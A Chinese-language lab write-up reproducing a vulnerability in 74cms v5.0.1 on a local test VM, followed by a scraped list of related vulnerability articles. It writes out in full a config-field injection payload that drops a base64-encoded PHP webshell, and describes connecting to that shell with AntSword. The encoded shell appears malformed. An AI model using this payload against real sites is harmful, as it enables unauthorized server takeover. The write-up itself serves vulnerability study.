一、环境搭建

这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。
1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html

2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。

3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。



OK,系统安装完成。

二、漏洞利用

1.登录后台以后,点击保存网站配置的同时用burpsuite抓包。


2.修改site_domain的内容,这里对内容进行base64加密:site_domain=‘,file_put_contents(‘403.php’,base64_decode(‘PD9waHAgZXZhbCgmX1BPU1QoJzEyMycpKTs/Pg==’)),’

3.这里等号需要URL编码


4.再次访问:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/url.php,使恶意语句成功执行。

5.一句话木马已被写入:

6.使用蚁剑连接:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/403.php

OK,连接成功,over。

74cms v5.0.1 漏洞复现相关推荐

  1. metinfov5.0.4漏洞复现

    metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简 ...

  2. ThinkPHP V5.0.5漏洞_ThinkPHP 5.x 远程命令执行漏洞分析与复现

    php中文网最新课程 每日17点准时技术干货分享 0x00 前言 ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新 ...

  3. ThinkPHP V5.0.5漏洞_漏洞考古:thiknphp5 代码执行漏洞

    thinkphp版本:v5.0.5 下载地址 https://www.thinkphp.cn/down/870.html poc:?s=index/thinkapp/invokefunction&am ...

  4. thinkphp v5.0.11漏洞_ThinkPHP5丨远程代码执行漏洞动态分析

    ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性.但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏 ...

  5. Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析

    0x01 前言 PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel.LibreOffic Calc等表格格式的文件,是PHPExcel的替代者.2018年11月 ...

  6. ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用

    一.组件介绍 1.1 基本信息 ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和Ta ...

  7. 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析

    年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...

  8. thinkphp v5.0.11漏洞_ThinkPHP 5.0.x-5.0.23、5.1.x、5.2.x 全版本远程代码执行漏洞分析

    阅读: 10,272 1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日又接连发布两个更新,这三次更新都修复了一个安全问题,该问题可能导致远程代码执行 ,这是ThinkPHP ...

  9. thinkphp v5.0.11漏洞_ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞

    12月9日,thinkPHP5.*发布了安全更新,这次更新修复了一处严重级别的漏洞,该漏洞可导致(php/系统)代码执行,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...

  10. thinkphp v5.0.11漏洞_Thinkphp 5.0远程代码执行漏洞

    0x01 简叙本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版 ...

最新文章

  1. Datawhale组队学习周报(第003周)
  2. TimeSpan 时间间隔
  3. optee中mutex的实现方式
  4. 钱大妈生鲜“败走北京”
  5. 自学it18大数据笔记-第二阶段Hive-day4——会持续更新……
  6. React Elements vs React Components
  7. Himall商城ObjectHelper帮助类(1)
  8. 使用YALMIP 求解LMI时遇到的问题
  9. 自定义数据类型的指针的含义
  10. 提高软件开发工作效率的几种方法
  11. html网页图片下方空隙太大,div+css排版图片IMG下边界有空隙
  12. java 从txt写入txt
  13. 自建内网穿透之frp
  14. Numpy学习之——numpy.mean中axis参数用法
  15. 如何使用装饰设计模式读取指定路径下的纯文本文件的实现代码
  16. 使用gcore工具产生core文件而不杀死进程
  17. 【源码】紫色UI趣味测试小程序源码各种测试(趣味测试、爱情测试、缘分测试、性格测试)
  18. db mysql / mysql dba / mysql manual / mysql config / mysql innotop
  19. WordPress安装详细教程(小白教程)
  20. web-VR(虚拟现实)

热门文章

  1. aspectjweaver:关于Spring注解AOP的注意点
  2. 【VFB】复制VB代码(VB与FB的差异)(VFB教程3-6)
  3. 服务器2008r2修改数据,win2008 R2服务器下修改MySQL 5.5数据库data目录的方法
  4. 瑞昱rtl8168网卡支持Linux吗,瑞昱 RTL8168F PCI-E专用网卡驱动,亲测可用
  5. 最佳 3D 建模软件
  6. 软件工程工具图(软件开发过程中可能用到的工具图)
  7. 完全卸载vs2008
  8. 基于java springboot android安卓商城购物平台源码(毕设)
  9. sql if语句实例
  10. 笔记本怎么打开html的面板,联想笔记本控制面板在哪里打开